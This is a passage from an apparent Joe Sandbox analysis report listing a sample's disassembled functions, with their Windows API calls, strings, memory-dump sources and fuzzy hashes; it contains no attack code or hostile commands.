                                                                                                                      • Part of subcall function 00007FF789BEA73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF789BE9A82), ref: 00007FF789BEA850
                                                                                                                    • wcsrchr.MSVCRT ref: 00007FF789BE9A62
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                                                                                    • String ID: %s=%s$.
                                                                                                                    • API String ID: 3242694432-4275322459
                                                                                                                    • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                                    • Instruction ID: 5414297cb00c008a79c1dbf11244db86b8437f34369ac74d58853153d79de8b8
                                                                                                                    • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                                                    • Instruction Fuzzy Hash: FD41BD25A0964E85EE10BF91A0542BDEAB4FF85FA6FA45230DD5D073D2EE7CE449C220
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE54B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 120synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF789BE54E6
                                                                                                                    • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF789BE552E
                                                                                                                      • Part of subcall function 00007FF789BE758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF789BE6999,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE75AE
                                                                                                                      • Part of subcall function 00007FF789BE758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF789BE6999,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE75C6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                                                    • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                                                    • API String ID: 779401067-630742106
                                                                                                                    • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                                    • Instruction ID: cad2fa252db2ab87e3651f123781cc645adeca30fc82f674049ff35c94ffe5d2
                                                                                                                    • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                                                    • Instruction Fuzzy Hash: 64516372A1868A85EB11AF11E4507FEEB74FF84F85FA04032EA4D47A55DE7CE405C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD417C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectorytowupper
                                                                                                                    • String ID: :$:
                                                                                                                    • API String ID: 238703822-3780739392
                                                                                                                    • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                    • Instruction ID: 98cff1a5754eb343d300de2a7997e97f027f66ac9d6b745524dd50b779719243
                                                                                                                    • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                                                    • Instruction Fuzzy Hash: 8011E25260974585EB25AF61A818279FEB0FF89F9AF958132DD0D07790EF3CD041C724
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC58D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                    • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                                    • API String ID: 3677997916-3870813718
                                                                                                                    • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                                    • Instruction ID: fcd01f18133ca2b31be13d4ffb338f541432e79ad7d6c3cd399daa0314935dcb
                                                                                                                    • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                                                    • Instruction Fuzzy Hash: 4E114F32618B45C7E7109F10E44826AFBB4FB85BA5F904131DA8D02768EFBCC048CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC4C18 Relevance: 7.7, APIs: 5, Instructions: 164COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memsetwcsrchr$wcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 110935159-0
                                                                                                                    • Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                                                    • Instruction ID: c77ceb5a62c36ffc044e3398d58599ab14a4d0c5bd6a39a1a447ed20a0a435f0
                                                                                                                    • Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                                                    • Instruction Fuzzy Hash: E351C722B0978A85FA25AF5198047F9EBB5BF49FBAFA44530CD5E07784DE3CE541C210
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD5EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$CurrentDirectorytowupper
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1403193329-0
                                                                                                                    • Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                                                                                                    • Instruction ID: cfce7da31b5c915edee0c46d5dfa7cbb31c75f7653b501316315413a2e349f04
                                                                                                                    • Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                                                                                                    • Instruction Fuzzy Hash: 2F51D826A09689C5EB24EF20D8586B9BBB0FF48F9AF958135DA0D07794EF3CD544C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC91C0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00007FF789BC921C
                                                                                                                    • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF789BC93AA
                                                                                                                      • Part of subcall function 00007FF789BC8B20: wcsrchr.MSVCRT ref: 00007FF789BC8BAB
                                                                                                                      • Part of subcall function 00007FF789BC8B20: _wcsicmp.MSVCRT ref: 00007FF789BC8BD4
                                                                                                                      • Part of subcall function 00007FF789BC8B20: _wcsicmp.MSVCRT ref: 00007FF789BC8BF2
                                                                                                                      • Part of subcall function 00007FF789BC8B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BC8C16
                                                                                                                      • Part of subcall function 00007FF789BC8B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF789BC8C2F
                                                                                                                      • Part of subcall function 00007FF789BC8B20: wcschr.MSVCRT ref: 00007FF789BC8CB3
                                                                                                                      • Part of subcall function 00007FF789BD417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF789BD41AD
                                                                                                                      • Part of subcall function 00007FF789BD3060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF789BC92AC), ref: 00007FF789BD30CA
                                                                                                                      • Part of subcall function 00007FF789BD3060: SetErrorMode.KERNELBASE ref: 00007FF789BD30DD
                                                                                                                      • Part of subcall function 00007FF789BD3060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BD30F6
                                                                                                                      • Part of subcall function 00007FF789BD3060: SetErrorMode.KERNELBASE ref: 00007FF789BD3106
                                                                                                                    • wcsrchr.MSVCRT ref: 00007FF789BC92D8
                                                                                                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF789BC9362
                                                                                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF789BC9373
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3966000956-0
                                                                                                                    • Opcode ID: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                                                                                                    • Instruction ID: e7a3b346f87b09f5962bbdac50a748e23d4be2599c119c09d5d30611594dd059
                                                                                                                    • Opcode Fuzzy Hash: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                                                                                                    • Instruction Fuzzy Hash: 4A51A632A0968AC5EB61AF11D8542B9BBB0FB89F5AFA44035DA0D07795DF3CE551C310
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC2A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$_setjmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3883041866-0
                                                                                                                    • Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                                                                                                    • Instruction ID: a485904a49f6f34e065a4957c3663e57087ae8433d1bcef19e9ba5c4edc52401
                                                                                                                    • Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                                                                                                    • Instruction Fuzzy Hash: EF513E32608BCA8AEB61DF21D8503E9B7B4FB49B49FA04135EA4D87A48DF3DD645C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCB49C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 106COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcsicmp.MSVCRT ref: 00007FF789BCB4BD
                                                                                                                      • Part of subcall function 00007FF789BD06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06D6
                                                                                                                      • Part of subcall function 00007FF789BD06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06F0
                                                                                                                      • Part of subcall function 00007FF789BD06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD074D
                                                                                                                      • Part of subcall function 00007FF789BD06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD0762
                                                                                                                    • _wcsicmp.MSVCRT ref: 00007FF789BCB518
                                                                                                                    • _wcsicmp.MSVCRT ref: 00007FF789BCB58B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                                    • String ID: ELSE$IF/?
                                                                                                                    • API String ID: 3223794493-1134991328
                                                                                                                    • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                                    • Instruction ID: 2dc4879d940366f50a2f27c4476a4e7ddf17d73efb25c53c79108324486e0d23
                                                                                                                    • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                                                    • Instruction Fuzzy Hash: 79413921E0D65AC2FA54BF65E4152BDAAB1BF84F5AFF45035D50E46292DE3DE900C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEE3E8 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1532185241-0
                                                                                                                    • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                                    • Instruction ID: 2ccb241acd87a2a7ca950f95f99590279620b8aeac42c859ae0c8f534dee009a
                                                                                                                    • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                                                    • Instruction Fuzzy Hash: 5D41D132A047968BE714AF21D44557DBEB5FB88F82FA54539EA0A47784CF3CE841C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC4FE8 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3588551418-0
                                                                                                                    • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                                    • Instruction ID: 4341d608989cfbbbcc4304e8e160257c044c26b8af96f35e59eae68e359eda2b
                                                                                                                    • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                                                    • Instruction Fuzzy Hash: 3D419035A0868A8BE764AF51D44027DFA71FF85F92FA44039DA0E47791CE6CE840C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BEE558 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002399849.00007FF789C14000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002481941.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2123716050-0
                                                                                                                    • Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                                                                                                    • Instruction ID: 9e1512480ec80439d8974e80984495766affe12fb01a835d6852ef3a1f1ff82a
                                                                                                                    • Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                                                                                                    • Instruction Fuzzy Hash: B141C332705BC68AEB31EF21D8543E9ABA4FB49B8DF544034DA4D4AA99DF3CD244C310
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC65F8 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2002326192.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2002309121.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
